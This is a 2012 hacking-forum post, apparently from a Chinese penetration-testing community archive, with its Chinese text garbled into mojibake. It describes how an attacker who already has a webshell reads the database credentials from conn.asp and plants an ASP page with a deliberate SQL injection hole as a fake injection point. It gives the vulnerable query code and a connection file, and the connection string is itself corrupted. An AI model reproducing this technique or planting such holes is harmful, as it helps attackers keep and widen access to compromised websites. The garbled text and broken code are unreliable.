Î±Ôì×¢Èëµã·½·¨

admin ·¢±íÓÚ 2012-9-13 17:53:08

Ê×ÏÈÄãÒªÄÃÁËÒ»¸öwebshell£¬ÕâÑùÄãÕÒµ½Á¬½ÓÊý¾Ý¿âµÄÎÄ¼þ£¬´ó¶à¶¼ÊÇconn.aspÕâ¸öÎÄ¼þÀïÃæÓÐmssqlµÄÓÃ»§ºÍÃÜÂë£¬ÄãÒªÕÒµ½ÓÃ»§Ãû¡¢ÃÜÂë¡¢Êý¾Ý¿âËùÔÚµÄIP£¬È»ºóÁ¬½ÓÉÏÈ¥£¬ÖÁÓÚÁ¬½Ó´ó¼ÒÓ¦¸Ã¶¼»á£¬ÕÒµ½ÍøÕ¾¹ÜÀíÔ±µÄ±í¡£ÒòÎªÎÒ²âÊÔµÄÊ±ºòÊÇÓÃ¹ÜÀíÔ±µÄ±í£¬ÎÒÅóÓÑËµÈÎºÎ±íÃû¶¼¿ÉÒÔ£¬Ö»ÒªÕâ¸ö±í´æÔÚ£¬´úÂëÈçÏÂ£º
ASP/Visual Basic´úÂë

<%
set rs=server.createobject("ADODB.recordset")
id = request("id")
strSQL = "select * from admin where id=" & id
rs.open strSQL,conn,1,3
rs.close
%>
°ÑstrSQL = "select * from admin where id=" & id Õâ¾ä»°ÀïÃæµÄadmin»»³ÉÒªÎ±ÔìµÄ±íÃû£¬×¢Òâ±ØÐë´æÔÚ¡£Äã¿ÉÒÔÁ¬½ÓÉÏÈ¥¿´ÏÂ±íÃû¾ÍÊÇÁË£¡ÕâÀï¼ÙÉèµÄÊÇadminÊÇ±íÃû£¡Õâ¸öÎÄ¼þÃûËæ±ã±£´æ£¡
È»ºó¾ÍÒª¹¹ÔìÒ»¸öÁ¬½ÓÊý¾Ý¿âµÄÎÄ¼þÁË£¬´úÂëÈçÏÂ£º
ASP/Visual Basic´úÂë
<%
strSQLServerName = "000.000.000.000" '·þÎñÆ÷Ãû³Æ»òµØÖ·
strSQLDBUserName = "sqlname"       'Êý¾Ý¿âÕÊºÅ
strSQLDBPassword = "sqlpass"       'Êý¾Ý¿âÃÜÂë
strSQLDBName = "sqldataname"       'Êý¾Ý¿âÃû³Æ
Set conn = Server.CreateObject("ADODB.Connection")
strCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
conn.open strCon
%>
ÕâÀïÓ¦¸Ã¶¼»áÁË£¬¾Í²»ÂÞàÂÁË£¬²»¹ý×¢ÒâµÄÊÇ±£´æµÄÎÄ¼þÃûÒªºÍincludeµ÷ÓÃµÄÃû×ÖÒ»Ñù¡£¾ÍÕâÑù£¬Õý³£Çé¿öÏÂ£¬¾ÍOKÁË£¬Î±Ôì³É¹¦

Ò³: [1]

ÖÐ¹úÍøÂçÉøÍ¸²âÊÔÁªÃË's Archiver

Î±Ôì×¢Èëµã·½·¨